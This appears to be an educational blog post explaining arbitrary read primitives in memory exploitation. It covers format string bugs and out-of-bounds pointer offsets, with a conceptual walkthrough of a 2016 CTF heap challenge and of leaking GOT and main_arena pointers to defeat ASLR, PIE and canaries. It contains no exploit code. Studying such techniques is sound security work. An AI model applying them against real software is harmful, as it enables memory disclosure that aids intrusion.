Arbitrary read primitives

An arbitrary read primitive is a condition in which the attacker can read any location within a process's virtual memory. A close formal definition for this condition provided by the Common Weakness Enumeration (CWE) list is Untrusted Pointer Dereference. This definition describes a condition for a program in which it will dereference the value of any pointer provided, whether it be from a trusted or untrusted source. An attacker can find usefulness from this condition if the program prints the content of the pointer provided. Below are some examples of how an attacker can implement or utilize an arbitrary read primitive present within a program.

Use of Externally-Controlled Format String

Just like in our Arbitrary write primitives discussion, we note that a format string vulnerability is not a condition that is implemented by an attacker, it's just present due to programmer error. The condition itself, however, is still useful for an attacker to arbitrarily read memory from any location in the process, given the right conditions.

Like our previous discussion, the attacker can provide an address in their forged format string in order to place that address onto the stack for their vulnerable printf() call. Also like our previous discussion, the attacker must know the offset of their placed address on the stack during the call to printf(). Unlike our previous discussion, the attacker will have to use different format string identifiers in order to print the contents of the address they placed onto the stack. The most commonly used format string identifiers used by attackers to dump information from memory are:

  • p - void*
  • x - unsigned int
  • s - null terminated string

Use of Out-of-range Pointer Offset

This particular condition is a child of Improper Restriction of Operations within the Bounds of a Memory Buffer, however, I feel like this is more applicable to this discussion about arbitrary read primitives. The most important portion of this condition's Extended Description is the statement:

If an attacker can control or influence the offset so that it points outside of the intended boundaries of the structure, then the attacker may be able to read or write to memory locations that are used elsewhere in the program.

For our discussion, we're interested in the implementation of an arbitrary read primitive using the condition described above. A good example of implementing an arbitrary read primitive is the feap challenge from ASIS CTF Quals 2016. The arbitrary read primitive for this challenge exists in the print_note function of the vulnerable executable. The print_note function conducts no bounds checking when indexing into the notes array, allowing the attacker to provide array indices that are outside the bounds of the notes array. This ultimately leads to the program treating these out of bounds locations as note structures, and attempts to call printf() on what it believes to be a note's title attribute.

Coincidentally, the note_sizes array resides directly below the notes array that the attacker is able to read past. The attacker is able to forge a valid pointer in memory in the note_sizes array by creating a note of a particular size: their target address - 0x40 (to account for the bytes added by the program). The attacker then reads past the notes array and fools the program into calling printf() on the valid memory address contained within note_sizes - the program thinks this pointer offset is a valid note struct. This condition in this CTF challenge provides the attacker the ability to implement an arbitrary read primitive.

So what are arbitrary read primitives good for?

Attackers most commonly use arbitrary read primitives to leak sensitive program information, allowing them to bypass mitigations such as ASLR, PIE, stack canaries, and possibly even pointer mangling. If the attacker can conduct an arbitrary read of data from the stack, they will most likely be able to expose glibc and program pointers or return addresses stored on the stack, allowing them to calculate the base addresses for the glibc and program segments in the process's virtual memory mapping. Attackers would also have an interest in leaking heap pointer information in order to derive the base of the heap in memory, especially if their method of gaining code execution is via a heap memory corruption vulnerability.

Conclusion

An arbitrary read primitive is only useful if an attacker knows what information they want and where to get it. Attackers must also know how to use an initial exposure to guide succeeding exposures - you won't always know the exact address of your arbitrary read target, and you might need to expose the contents of other data structures in memory in order to find it.

Take for example a vulnerable non-PIE binary where an attacker can implement an arbitrary read primitive. The attacker doesn't know where the stack is, but they do know the location of the Global Offset Table (GOT), allowing them to leak glibc information for functions that have been called and their address within glibc resolved - from here an attacker can now derive the base of glibc in process memory. Now knowing the base of glibc in memory, if the attacker wished to locate the base of the heap, they would be able to target the main_arena in glibc. Using the main_arena, the attacker can leak the location of one of the bins, allowing them the ability to derive the base of the heap in memory. The usefulness of an arbitrary read primitive relies on its user's understanding of the state of the process when the primitive is implemented and the user's knowledge of where important data structures are stored in process memory.

References

  1. https://cwe.mitre.org/data/definitions/822.html
  2. https://cwe.mitre.org/data/definitions/134.html
  3. Arbitrary write primitives
  4. https://cwe.mitre.org/data/definitions/823.html
  5. https://ctftime.org/task/2370